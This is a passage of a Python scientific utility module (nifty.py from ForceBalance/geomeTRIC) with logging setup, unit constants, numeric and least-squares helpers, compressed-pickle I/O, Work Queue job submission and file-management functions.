- Math: Variable manipulation, linear algebra, least squares polynomial fitting
- Pickle: Expand Python's own pickle to accommodate writing XML etree objects
- Commands for submitting things to the Work Queue
- Various file and process management functions
- Development stuff (not commonly used)
Named after the mighty Sniffy Handy Nifty (King Sniffy)
@author Lee-Ping Wang
@date 2018-03-10
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import filecmp
import itertools
import os
import re
import shutil
import sys
from select import select
import numpy as np
from numpy.linalg import multi_dot
# For Python 3 compatibility
try:
from itertools import zip_longest as zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
import threading
from pickle import Pickler, Unpickler
import tarfile
import time
import subprocess
import math
import six # For six.string_types
from subprocess import PIPE
from collections import OrderedDict, defaultdict
#================================#
# Set up the logger #
#================================#
if "forcebalance" in __name__:
# If this module is part of ForceBalance, use the package level logger
from .output import *
package="ForceBalance"
else:
from logging import *
# Define two handlers that don't print newline characters at the end of each line
class RawStreamHandler(StreamHandler):
"""
Exactly like StreamHandler, except no newline character is printed at the end of each message.
This is done in order to ensure functions in molecule.py and nifty.py work consistently
across multiple packages.
"""
def __init__(self, stream = sys.stdout):
super(RawStreamHandler, self).__init__(stream)
def emit(self, record):
message = record.getMessage()
self.stream.write(message)
self.flush()
class RawFileHandler(FileHandler):
"""
Exactly like FileHandler, except no newline character is printed at the end of each message.
This is done in order to ensure functions in molecule.py and nifty.py work consistently
across multiple packages.
"""
def __init__(self, *args, **kwargs):
super(RawFileHandler, self).__init__(*args, **kwargs)
def emit(self, record):
if self.stream is None:
self.stream = self._open()
message = record.getMessage()
self.stream.write(message)
self.flush()
if "geometric" in __name__:
# This ensures logging behavior is consistent with the rest of geomeTRIC
logger = getLogger(__name__)
logger.setLevel(INFO)
package="geomeTRIC"
else:
logger = getLogger("NiftyLogger")
logger.setLevel(INFO)
handler = RawStreamHandler()
logger.addHandler(handler)
if __name__ == "__main__":
package = "LPW-nifty.py"
else:
package = __name__.split('.')[0]
try:
import bz2
HaveBZ2 = True
except ImportError:
logger.warning("bz2 module import failed (used in compressing or decompressing pickle files)\n")
HaveBZ2 = False
try:
import gzip
HaveGZ = True
except ImportError:
logger.warning("gzip module import failed (used in compressing or decompressing pickle files)\n")
HaveGZ = False
## Boltzmann constant
kb = 0.0083144100163
## Q-Chem to GMX unit conversion for energy
eqcgmx = 2625.5002
## Q-Chem to GMX unit conversion for force
fqcgmx = -49621.9
# Conversion factors
bohr2ang = 0.529177210
ang2bohr = 1.0 / bohr2ang
au2kcal = 627.5096080306
kcal2au = 1.0 / au2kcal
au2kj = 2625.5002
kj2au = 1.0 / au2kj
grad_au2gmx = 49614.75960959161
grad_gmx2au = 1.0 / grad_au2gmx
# Gradient units
au2evang = 51.42209166566339
evang2au = 1.0 / au2evang
#=========================#
# I/O formatting #
#=========================#
# These functions may be useful someday but I have not tested them
# def bzip2(src):
# dest = src+'.bz2'
# if not os.path.exists(src):
# logger.error('File to be compressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Archive to be created already exists')
# raise RuntimeError
# with open(src, 'rb') as input:
# with bz2.BZ2File(dest, 'wb', compresslevel=9) as output:
# copyfileobj(input, output)
# os.remove(input)
# def bunzip2(src):
# dest = re.sub('\.bz2$', '', src)
# if not os.path.exists(src):
# logger.error('File to be decompressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Target path for decompression already exists')
# raise RuntimeError
# with bz2.BZ2File(src, 'rb', compresslevel=9) as input:
# with open(dest, 'wb') as output:
# copyfileobj(input, output)
# os.remove(input)
def pvec1d(vec1d, precision=1, format="e", loglevel=INFO):
"""Printout of a 1-D vector.
@param[in] vec1d a 1-D vector
"""
v2a = np.array(vec1d)
for i in range(v2a.shape[0]):
logger.log(loglevel, "%% .%i%s " % (precision, format) % v2a[i])
logger.log(loglevel, '\n')
def astr(vec1d, precision=4):
""" Write an array to a string so we can use it to key a dictionary. """
return ' '.join([("%% .%ie " % precision % i) for i in vec1d])
def pmat2d(mat2d, precision=1, format="e", loglevel=INFO):
"""Printout of a 2-D array.
@param[in] mat2d a 2-D array
"""
m2a = np.array(mat2d)
for i in range(m2a.shape[0]):
for j in range(m2a.shape[1]):
logger.log(loglevel, "%% .%i%s " % (precision, format) % m2a[i][j])
logger.log(loglevel, '\n')
def grouper(iterable, n):
"""Collect data into fixed-length chunks or blocks"""
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
lzip = [[j for j in i if j is not None] for i in list(zip_longest(*args))]
return lzip
def encode(l):
return [[len(list(group)),name] for name, group in itertools.groupby(l)]
def segments(e):
# Takes encoded input.
begins = np.array([sum([k[0] for k in e][:j]) for j,i in enumerate(e) if i[1] == 1])
lens = np.array([i[0] for i in e if i[1] == 1])
return [(i, i+j) for i, j in zip(begins, lens)]
def commadash(l):
# Formats a list like [27, 28, 29, 30, 31, 88, 89, 90, 91, 100, 136, 137, 138, 139]
# into '27-31,88-91,100,136-139
L = sorted(l)
if len(L) == 0:
return "(empty)"
L.append(L[-1]+1)
LL = [i in L for i in range(L[-1])]
return ','.join('%i-%i' % (i[0]+1,i[1]) if (i[1]-1 > i[0]) else '%i' % (i[0]+1) for i in segments(encode(LL)))
def uncommadash(s):
# Takes a string like '27-31,88-91,100,136-139'
# and turns it into a list like [26, 27, 28, 29, 30, 87, 88, 89, 90, 99, 135, 136, 137, 138]
L = []
try:
for w in s.split(','):
ws = w.split('-')
a = int(ws[0])-1
if len(ws) == 1:
b = int(ws[0])
elif len(ws) == 2:
b = int(ws[1])
else:
logger.warning("Dash-separated list cannot exceed length 2\n")
raise
if a < 0 or b <= 0 or b <= a:
if a < 0 or b <= 0:
logger.warning("Items in list cannot be zero or negative: %d %d\n" % (a, b))
else:
logger.warning("Second number cannot be smaller than first: %d %d\n" % (a, b))
raise
newL = range(a,b)
if any([i in L for i in newL]):
logger.warning("Duplicate entries found in list\n")
raise
L += newL
if sorted(L) != L:
logger.warning("List is out of order\n")
raise
except:
logger.error('Invalid string for converting to list of numbers: %s\n' % s)
raise RuntimeError
return L
def natural_sort(l):
""" Return a natural sorted list. """
# Convert a character to a digit or a lowercase character
convert = lambda text: int(text) if text.isdigit() else text.lower()
# Split string into "integer" and "noninteger" fields and convert each one
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
# Sort strings using these keys in descending order of importance, I guess.
return sorted(l, key = alphanum_key)
def printcool(text,sym="#",bold=False,color=2,ansi=None,bottom='-',minwidth=50,center=True,sym2="="):
"""Cool-looking printout for slick formatting of output.
@param[in] text The string that the printout is based upon. This function
will print out the string, ANSI-colored and enclosed in the symbol
for example:\n
<tt> ################# </tt>\n
<tt> ### I am cool ### </tt>\n
<tt> ################# </tt>
@param[in] sym The surrounding symbol\n
@param[in] bold Whether to use bold print
@param[in] color The ANSI color:\n
1 red\n
2 green\n
3 yellow\n
4 blue\n
5 magenta\n
6 cyan\n
7 white
@param[in] bottom The symbol for the bottom bar
@param[in] minwidth The minimum width for the box, if the text is very short
then we insert the appropriate number of padding spaces
@return bar The bottom bar is returned for the user to print later, e.g. to mark off a 'section'
"""
def newlen(l):
return len(re.sub(r"\x1b\[[0-9;]*m","",l))
text = text.split('\n')
width = max(minwidth,max([newlen(line) for line in text]))
bar = ''.join([sym2 for i in range(width + 6)])
bar = sym + bar + sym
#bar = ''.join([sym for i in range(width + 8)])
logger.info('\r'+bar + '\n')
for ln, line in enumerate(text):
if type(center) is list: c1 = center[ln]
else: c1 = center
if c1:
padleft = ' ' * (int((width - newlen(line))/2))
else:
padleft = ''
padright = ' '* (width - newlen(line) - len(padleft))
if ansi is not None:
ansi = str(ansi)
logger.info("%s| \x1b[%sm%s " % (sym, ansi, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
elif color is not None:
if color == 0 and bold:
logger.info("%s| \x1b[1m%s " % (sym, padleft) + line + " %s\x1b[0m |%s\n" % (padright, sym))
elif color == 0:
logger.info("%s| %s " % (sym, padleft)+line+" %s |%s\n" % (padright, sym))
else:
logger.info("%s| \x1b[%s9%im%s " % (sym, bold and "1;" or "", color, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
# if color == 3 or color == 7:
# print "%s\x1b[40m\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
# else:
# print "%s\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
else:
warn_press_key("Inappropriate use of printcool")
logger.info(bar + '\n')
botbar = ''.join([bottom for i in range(width + 8)])
return botbar + '\n'
def printcool_dictionary(Dict,title="Dictionary Keys : Values",bold=False,color=2,keywidth=25,topwidth=50,center=True,leftpad=0):
"""See documentation for printcool; this is a nice way to print out keys/values in a dictionary.
The keys in the dictionary are sorted before printing out.
@param[in] dict The dictionary to be printed
@param[in] title The title of the printout
"""
if Dict is None: return
bar = printcool(title,bold=bold,color=color,minwidth=topwidth,center=center)
def magic_string(str):
# This cryptic command returns a string with the number of characters specified as a variable. :P
# Useful for printing nice-looking dictionaries, i guess.
# print "\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"'))
return eval("\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"')))
if isinstance(Dict, OrderedDict):
logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in Dict if Dict[key] is not None]))
else:
logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in sorted([i for i in Dict]) if Dict[key] is not None]))
logger.info("\n%s" % bar)
#===============================#
#| Math: Variable manipulation |#
#===============================#
def isint(word):
"""ONLY matches integers! If you have a decimal point? None shall pass!
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is an integer (only +/- sign followed by digits)
"""
try:
word = str(word)
except:
return False
return re.match('^[-+]?[0-9]+$', word)
def isfloat(word):
"""Matches ANY number; it can be a decimal, scientific notation, what have you
CAUTION - this will also match an integer.
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is any number
"""
try: word = str(word)
except: return False
if len(word) == 0: return False
return re.match(r'^[-+]?[0-9]*\.?[0-9]*([eEdD][-+]?[0-9]+)?$',word)
def isdecimal(word):
"""Matches things with a decimal only; see isint and isfloat.
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is a number with a decimal point
"""
try: word = str(word)
except: return False
return isfloat(word) and not isint(word)
def floatornan(word):
"""Returns a big number if we encounter NaN.
@param[in] word The string to be converted
@return answer The string converted to a float; if not a float, return 1e10
@todo I could use suggestions for making this better.
"""
big = 1e10
if isfloat(word):
return float(word)
else:
logger.info("Setting %s to % .1e\n" % big)
return big
def col(vec):
"""
Given any list, array, or matrix, return a 1-column 2D array.
Input:
vec = The input vector that is to be made into a column
Output:
A 1-column 2D array
"""
return np.array(vec).reshape(-1, 1)
def row(vec):
"""Given any list, array, or matrix, return a 1-row 2D array.
@param[in] vec The input vector that is to be made into a row
@return answer A 1-row 2D array
"""
return np.array(vec).reshape(1, -1)
def flat(vec):
"""Given any list, array, or matrix, return a single-index array.
@param[in] vec The data to be flattened
@return answer The flattened data
"""
return np.array(vec).reshape(-1)
def est124(val):
"""Given any positive floating point value, return a value [124]e+xx
that is closest to it in the log space.
"""
log = np.log10(val)
logint = math.floor(log)
logfrac = log - logint
log1 = 0.0
log2 = 0.3010299956639812
log4 = 0.6020599913279624
log10 = 1.0
if logfrac < 0.5*(log1+log2):
fac = 1.0
elif logfrac < 0.5*(log2+log4):
fac = 2.0
elif logfrac < 0.5*(log4+log10):
fac = 4.0
else:
fac = 10.0
return fac*10**logint
def est1234568(val):
"""Given any positive floating point value, return a value [1234568]e+xx
that is closest to it in the log space. Just because I don't like seven
and nine. Call me a numberist?
"""
log = np.log10(val)
logint = math.floor(log)
logfrac = log - logint
log1 = 0.0
log2 = 0.3010299956639812
log3 = np.log10(3)
log4 = 0.6020599913279624
log5 = np.log10(5)
log6 = np.log10(6)
log8 = np.log10(8)
log10 = 1.0
if logfrac < 0.5*(log1+log2):
fac = 1.0
elif logfrac < 0.5*(log2+log3):
fac = 2.0
elif logfrac < 0.5*(log3+log4):
fac = 3.0
elif logfrac < 0.5*(log4+log5):
fac = 4.0
elif logfrac < 0.5*(log5+log6):
fac = 5.0
elif logfrac < 0.5*(log6+log8):
fac = 6.0
elif logfrac < 0.5*(log8+log10):
fac = 8.0
else:
fac = 10.0
return fac*10**logint
def monotonic(arr, start, end):
# Make sure an array is monotonically decreasing from the start to the end.
a0 = arr[start]
i0 = start
if end > start:
i = start+1
while i < end:
if arr[i] < a0:
arr[i0:i+1] = np.linspace(a0, arr[i], i-i0+1)
a0 = arr[i]
i0 = i
i += 1
if end < start:
i = start-1
while i >= end:
if arr[i] < a0:
arr[i:i0+1] = np.linspace(arr[i], a0, i0-i+1)
a0 = arr[i]
i0 = i
i -= 1
def monotonic_decreasing(arr, start=None, end=None, verbose=False):
"""
Return the indices of an array corresponding to strictly monotonic
decreasing behavior.
Parameters
----------
arr : numpy.ndarray
Input array
start : int
Starting index (first element if None)
end : int
Ending index (last element if None)
Returns
-------
indices : numpy.ndarray
Selected indices
"""
if start is None:
start = 0
if end is None:
end = len(arr) - 1
a0 = arr[start]
idx = [start]
if verbose: logger.info("Starting @ %i : %.6f\n" % (start, arr[start]))
if end > start:
i = start+1
while i < end:
if arr[i] < a0:
a0 = arr[i]
idx.append(i)
if verbose: logger.info("Including %i : %.6f\n" % (i, arr[i]))
else:
if verbose: logger.info("Excluding %i : %.6f\n" % (i, arr[i]))
i += 1
if end < start:
i = start-1
while i >= end:
if arr[i] < a0:
a0 = arr[i]
idx.append(i)
if verbose: logger.info("Including %i : %.6f\n" % (i, arr[i]))
else:
if verbose: logger.info("Excluding %i : %.6f\n" % (i, arr[i]))
i -= 1
return np.array(idx)
#====================================#
#| Math: Vectors and linear algebra |#
#====================================#
def orthogonalize(vec1, vec2):
"""Given two vectors vec1 and vec2, project out the component of vec1
that is along the vec2-direction.
@param[in] vec1 The projectee (i.e. output is some modified version of vec1)
@param[in] vec2 The projector (component subtracted out from vec1 is parallel to this)
@return answer A copy of vec1 but with the vec2-component projected out.
"""
v2u = vec2/np.linalg.norm(vec2)
return vec1 - v2u*np.dot(vec1, v2u)
def invert_svd(X,thresh=1e-12):
"""
Invert a matrix using singular value decomposition.
@param[in] X The 2-D NumPy array containing the matrix to be inverted
@param[in] thresh The SVD threshold; eigenvalues below this are not inverted but set to zero
@return Xt The 2-D NumPy array containing the inverted matrix
"""
u,s,vh = np.linalg.svd(X, full_matrices=0)
uh = np.transpose(u)
v = np.transpose(vh)
si = s.copy()
for i in range(s.shape[0]):
if abs(s[i]) > thresh:
si[i] = 1./s[i]
else:
si[i] = 0.0
si = np.diag(si)
Xt = multi_dot([v, si, uh])
return Xt
#==============================#
#| Linear least squares |#
#==============================#
def get_least_squares(x, y, w = None, thresh=1e-12):
"""
@code
__ __
| |
| 1 (x0) (x0)^2 (x0)^3 |
| 1 (x1) (x1)^2 (x1)^3 |
| 1 (x2) (x2)^2 (x2)^3 |
| 1 (x3) (x3)^2 (x3)^3 |
| 1 (x4) (x4)^2 (x4)^3 |
|__ __|
@endcode
@param[in] X (2-D array) An array of X-values (see above)
@param[in] Y (array) An array of Y-values (only used in getting the least squares coefficients)
@param[in] w (array) An array of weights, hopefully normalized to one.
@param[out] Beta The least-squares coefficients
@param[out] Hat The hat matrix that takes linear combinations of data y-values to give fitted y-values (weights)
@param[out] yfit The fitted y-values
@param[out] MPPI The Moore-Penrose pseudoinverse (multiply by Y to get least-squares coefficients, multiply by dY/dk to get derivatives of least-squares coefficients)
"""
# X is a 'tall' matrix.
X = np.array(x)
if len(X.shape) == 1:
X = X[:,np.newaxis]
Y = col(y)
n_x = X.shape[0]
n_fit = X.shape[1]
if n_fit > n_x:
logger.warning("Argh? It seems like this problem is underdetermined!\n")
# Build the weight matrix.
if w is not None:
if len(w) != n_x:
warn_press_key("The weight array length (%i) must be the same as the number of 'X' data points (%i)!" % len(w), n_x)
w /= np.mean(w)
WH = np.diag(w**0.5)
else:
WH = np.eye(n_x)
# Make the Moore-Penrose Pseudoinverse.
# if n_fit == n_x:
# MPPI = np.linalg.inv(WH*X)
# else:
# This resembles the formula (X'WX)^-1 X' W^1/2
MPPI = np.linalg.pinv(np.dot(WH, X))
Beta = multi_dot([MPPI, WH, Y])
Hat = multi_dot([WH, X, MPPI])
yfit = flat(np.dot(Hat, Y))
# Return three things: the least-squares coefficients, the hat matrix (turns y into yfit), and yfit
# We could get these all from MPPI, but I might get confused later on, so might as well do it here :P
return np.array(Beta).flatten(), np.array(Hat), np.array(yfit).flatten(), np.array(MPPI)
#===========================================#
#| John's statisticalInefficiency function |#
#===========================================#
def statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
"""
Compute the (cross) statistical inefficiency of (two) timeseries.
Notes
The same timeseries can be used for both A_n and B_n to get the autocorrelation statistical inefficiency.
The fast method described in Ref [1] is used to compute g.
References
[1] J. D. Chodera, W. C. Swope, J. W. Pitera, C. Seok, and K. A. Dill. Use of the weighted
histogram analysis method for the analysis of simulated and parallel tempering simulations.
JCTC 3(1):26-41, 2007.
Examples
Compute statistical inefficiency of timeseries data with known correlation time.
>>> import timeseries
>>> A_n = timeseries.generateCorrelatedTimeseries(N=100000, tau=5.0)
>>> g = statisticalInefficiency(A_n, fast=True)
@param[in] A_n (required, numpy array) - A_n[n] is nth value of
timeseries A. Length is deduced from vector.
@param[in] B_n (optional, numpy array) - B_n[n] is nth value of
timeseries B. Length is deduced from vector. If supplied, the
cross-correlation of timeseries A and B will be estimated instead of
the autocorrelation of timeseries A.
@param[in] fast (optional, boolean) - if True, will use faster (but
less accurate) method to estimate correlation time, described in
Ref. [1] (default: False)
@param[in] mintime (optional, int) - minimum amount of correlation
function to compute (default: 3) The algorithm terminates after
computing the correlation time out to mintime when the correlation
function furst goes negative. Note that this time may need to be
increased if there is a strong initial negative peak in the
correlation function.
@return g The estimated statistical inefficiency (equal to 1 + 2
tau, where tau is the correlation time). We enforce g >= 1.0.
"""
# Create numpy copies of input arguments.
A_n = np.array(A_n)
if B_n is not None:
B_n = np.array(B_n)
else:
B_n = np.array(A_n)
# Get the length of the timeseries.
N = A_n.shape[0]
# Be sure A_n and B_n have the same dimensions.
if A_n.shape != B_n.shape:
logger.error('A_n and B_n must have same dimensions.\n')
raise ParameterError
# Initialize statistical inefficiency estimate with uncorrelated value.
g = 1.0
# Compute mean of each timeseries.
mu_A = A_n.mean()
mu_B = B_n.mean()
# Make temporary copies of fluctuation from mean.
dA_n = A_n.astype(np.float64) - mu_A
dB_n = B_n.astype(np.float64) - mu_B
# Compute estimator of covariance of (A,B) using estimator that will ensure C(0) = 1.
sigma2_AB = (dA_n * dB_n).mean() # standard estimator to ensure C(0) = 1
# Trap the case where this covariance is zero, and we cannot proceed.
if sigma2_AB == 0:
if warn:
logger.warning('Sample covariance sigma_AB^2 = 0 -- cannot compute statistical inefficiency\n')
return 1.0
# Accumulate the integrated correlation time by computing the normalized correlation time at
# increasing values of t. Stop accumulating if the correlation function goes negative, since
# this is unlikely to occur unless the correlation function has decayed to the point where it
# is dominated by noise and indistinguishable from zero.
t = 1
increment = 1
while t < N-1:
# compute normalized fluctuation correlation function at time t
C = sum( dA_n[0:(N-t)]*dB_n[t:N] + dB_n[0:(N-t)]*dA_n[t:N] ) / (2.0 * float(N-t) * sigma2_AB)
# Terminate if the correlation function has crossed zero and we've computed the correlation
# function at least out to 'mintime'.
if (C <= 0.0) and (t > mintime):
break
# Accumulate contribution to the statistical inefficiency.
g += 2.0 * C * (1.0 - float(t)/float(N)) * float(increment)
# Increment t and the amount by which we increment t.
t += increment
# Increase the interval if "fast mode" is on.
if fast: increment += 1
# g must be at least unity
if g < 1.0: g = 1.0
# Return the computed statistical inefficiency.
return g
def mean_stderr(ts):
"""Return mean and standard deviation of a time series ts."""
return np.mean(ts), \
np.std(ts)*np.sqrt(statisticalInefficiency(ts, warn=False)/len(ts))
# Slices a 2D array of data by column. The new array is fed into the statisticalInefficiency function.
def multiD_statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
n_row = A_n.shape[0]
n_col = A_n.shape[-1]
multiD_sI = np.zeros((n_row, n_col))
for col in range(n_col):
if B_n is None:
multiD_sI[:,col] = statisticalInefficiency(A_n[:,col], B_n, fast, mintime, warn)
else:
multiD_sI[:,col] = statisticalInefficiency(A_n[:,col], B_n[:,col], fast, mintime, warn)
return multiD_sI
#========================================#
#| Loading compressed pickles |#
#========================================#
def lp_dump(obj, fnm, protocol=0):
""" Write an object to a zipped pickle file specified by the path. """
# Safeguard against overwriting files? Nah.
# if os.path.exists(fnm):
# logger.error("lp_dump cannot write to an existing path")
# raise IOError
if os.path.islink(fnm):
logger.warning("Trying to write to a symbolic link %s, removing it first\n" % fnm)
os.unlink(fnm)
if HaveGZ:
f = gzip.GzipFile(fnm, 'wb')
elif HaveBZ2:
f = bz2.BZ2File(fnm, 'wb')
else:
f = open(fnm, 'wb')
Pickler(f, protocol).dump(obj)
f.close()
def lp_load(fnm):
""" Read an object from a bzipped file specified by the path. """
if not os.path.exists(fnm):
logger.error("lp_load cannot read from a path that doesn't exist (%s)" % fnm)
raise IOError
def load_uncompress():
logger.warning("Compressed file loader failed, attempting to read as uncompressed file\n")
f = open(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
def load_bz2():
f = bz2.BZ2File(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
def load_gz():
f = gzip.GzipFile(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
if HaveGZ:
try:
answer = load_gz()
except:
if HaveBZ2:
try:
answer = load_bz2()
except:
answer = load_uncompress()
else:
answer = load_uncompress()
elif HaveBZ2:
try:
answer = load_bz2()
except:
answer = load_uncompress()
else:
answer = load_uncompress()
return answer
#==============================#
#| Work Queue stuff |#
#==============================#
try:
import work_queue
except:
pass
#logger.warning("Work Queue library import fail (You can't queue up jobs using Work Queue)\n")
# Global variable corresponding to the Work Queue object
WORK_QUEUE = None
# Global variable containing a mapping from target names to Work Queue task IDs
WQIDS = defaultdict(list)
def getWorkQueue():
global WORK_QUEUE
return WORK_QUEUE
def getWQIds():
global WQIDS
return WQIDS
def createWorkQueue(wq_port, debug=True, name=package):
global WORK_QUEUE
if debug:
work_queue.set_debug_flag('all')
WORK_QUEUE = work_queue.WorkQueue(port=wq_port)
WORK_QUEUE.specify_name(name)
# QYD: prefer the worker that is fastest in previous tasks
# another choice is first-come-first serve: WORK_QUEUE_SCHEDULE_FCFS
WORK_QUEUE.specify_algorithm(work_queue.WORK_QUEUE_SCHEDULE_TIME)
# QYD: We don't want to specify the following extremely long keepalive times
# because they will prevent checking "dead" workers, causing the program to wait forever
#WORK_QUEUE.specify_keepalive_timeout(8640000)
#WORK_QUEUE.specify_keepalive_interval(8640000)
def destroyWorkQueue():
# Convenience function to destroy the Work Queue objects.
global WORK_QUEUE, WQIDS
WORK_QUEUE = None
WQIDS = defaultdict(list)
def queue_up(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
"""
Submit a job to the Work Queue.
@param[in] wq (Work Queue Object)
@param[in] command (string) The command to run on the remote worker.
@param[in] input_files (list of files) A list of locations of the input files.
@param[in] output_files (list of files) A list of locations of the output files.
"""
global WQIDS
task = work_queue.Task(command)
cwd = os.getcwd()
for f in input_files:
lf = os.path.join(cwd,f)
task.specify_input_file(lf,f,cache=False)
for f in output_files:
lf = os.path.join(cwd,f)
task.specify_output_file(lf,f,cache=False)
if tag is None: tag = command
task.specify_tag(tag)
task.print_time = print_time
taskid = wq.submit(task)
if verbose:
logger.info("Submitting command '%s' to the Work Queue, %staskid %i\n" % (command, "tag %s, " % tag if tag != command else "", taskid))
if tgt is not None:
WQIDS[tgt.name].append(taskid)
else:
WQIDS["None"].append(taskid)
def queue_up_src_dest(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
"""
Submit a job to the Work Queue. This function is a bit fancier in that we can explicitly
specify where the input files come from, and where the output files go to.
@param[in] wq (Work Queue Object)
@param[in] command (string) The command to run on the remote worker.
@param[in] input_files (list of 2-tuples) A list of local and
remote locations of the input files.
@param[in] output_files (list of 2-tuples) A list of local and
remote locations of the output files.
"""
global WQIDS
task = work_queue.Task(command)
for f in input_files:
# print f[0], f[1]
task.specify_input_file(f[0],f[1],cache=False)
for f in output_files:
# print f[0], f[1]
task.specify_output_file(f[0],f[1],cache=False)
if tag is None: tag = command
task.specify_tag(tag)
task.print_time = print_time
taskid = wq.submit(task)
if verbose:
logger.info("Submitting command '%s' to the Work Queue, taskid %i\n" % (command, taskid))
if tgt is not None:
WQIDS[tgt.name].append(taskid)
else:
WQIDS["None"].append(taskid)
def wq_wait1(wq, wait_time=10, wait_intvl=1, print_time=60, verbose=False):
""" This function waits ten seconds to see if a task in the Work Queue has finished. """
global WQIDS
if verbose: logger.info('---\n')
if wait_intvl >= wait_time:
wait_time = wait_intvl
numwaits = 1
else:
numwaits = int(wait_time/wait_intvl)
for sec in range(numwaits):
task = wq.wait(wait_intvl)
if task:
exectime = task.cmd_execution_time/1000000
if verbose:
logger.info('A job has finished!\n')
logger.info('Job name = ' + task.tag + 'command = ' + task.command + '\n')
logger.info("status = " + task.status + '\n')
logger.info("return_status = " + task.return_status)
logger.info("result = " + task.result)
logger.info("host = " + task.hostname + '\n')
logger.info("execution time = " + exectime)
logger.info("total_bytes_transferred = " + task.total_bytes_transferred + '\n')
if task.result != 0:
oldid = task.id
oldhost = task.hostname
tgtname = "None"
for tnm in WQIDS:
if task.id in WQIDS[tnm]:
tgtname = tnm
WQIDS[tnm].remove(task.id)
taskid = wq.submit(task)
logger.warning("Task '%s' (task %i) failed on host %s (%i seconds), resubmitted: taskid %i\n" % (task.tag, oldid, oldhost, exectime, taskid))
WQIDS[tgtname].append(taskid)
else:
if hasattr(task, 'print_time'):
print_time = task.print_time
if exectime > print_time: # Assume that we're only interested in printing jobs that last longer than a minute.
logger.info("Task '%s' (task %i) finished successfully on host %s (%i seconds)\n" % (task.tag, task.id, task.hostname, exectime))
for tnm in WQIDS:
if task.id in WQIDS[tnm]:
WQIDS[tnm].remove(task.id)
del task
# LPW 2018-09-10 Updated to use stats fields from CCTools 6.2.10
# Please upgrade CCTools version if errors are encountered during runtime.
if verbose:
logger.info("Workers: %i init, %i idle, %i busy, %i total joined, %i total removed\n" \
% (wq.stats.workers_init, wq.stats.workers_idle, wq.stats.workers_busy, wq.stats.workers_joined, wq.stats.workers_removed))
logger.info("Tasks: %i running, %i waiting, %i dispatched, %i submitted, %i total complete\n" \
% (wq.stats.tasks_running, wq.stats.tasks_waiting, wq.stats.tasks_dispatched, wq.stats.tasks_submitted, wq.stats.tasks_done))
logger.info("Data: %i / %i kb sent/received\n" % (int(wq.stats.bytes_sent/1024), int(wq.stats.bytes_received/1024)))
else:
logger.info("\r%s : %i/%i workers busy; %i/%i jobs complete \r" %\
(time.ctime(), wq.stats.workers_busy, wq.stats.workers_connected, wq.stats.tasks_done, wq.stats.tasks_submitted))
if time.time() - wq_wait1.t0 > 900:
wq_wait1.t0 = time.time()
logger.info('\n')
wq_wait1.t0 = time.time()
def wq_wait(wq, wait_time=10, wait_intvl=10, print_time=60, verbose=False):
""" This function waits until the work queue is completely empty. """
while not wq.empty():
wq_wait1(wq, wait_time=wait_time, wait_intvl=wait_intvl, print_time=print_time, verbose=verbose)
#=====================================#
#| File and process management stuff |#
#=====================================#
def click():
""" Stopwatch function for timing. """
ans = time.time() - click.t0
click.t0 = time.time()
return ans
click.t0 = time.time()
# Back up a file.
def bak(path, dest=None):
oldf = path
newf = None
if os.path.exists(path):
dnm, fnm = os.path.split(path)
if dnm == '' : dnm = '.'
base, ext = os.path.splitext(fnm)
if dest is None:
dest = dnm
if not os.path.isdir(dest): os.makedirs(dest)
i = 1
while True:
fnm = "%s_%i%s" % (base,i,ext)
newf = os.path.join(dest, fnm)
if not os.path.exists(newf): break
i += 1
logger.info("Backing up %s -> %s\n" % (oldf, newf))
shutil.move(oldf,newf)
return newf
# Purpose: Given a file name and/or an extension, do one of the following:
# 1) If provided a file name, check the file, crash if not exist and err==True. Return the file name.
# 2) If list is empty but extension is provided, check if one file exists that matches
# the extension. If so, return the file name.
# 3) If list is still empty and err==True, then crash with an error.
def onefile(fnm=None, ext=None, err=False):
if fnm is None and ext is None:
if err:
logger.error("Must provide either filename or extension to onefile()")
raise RuntimeError
else:
return None
if fnm is not None:
if os.path.exists(fnm):
if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
fsrc = os.path.abspath(fnm)
fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
#-----
# If the file path doesn't correspond to the current directory, copy the file over
# If the file exists in the current directory already and it's different, then crash.
#-----
if os.path.exists(fdest):
if not filecmp.cmp(fsrc, fdest):
logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
raise RuntimeError
else:
logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
else:
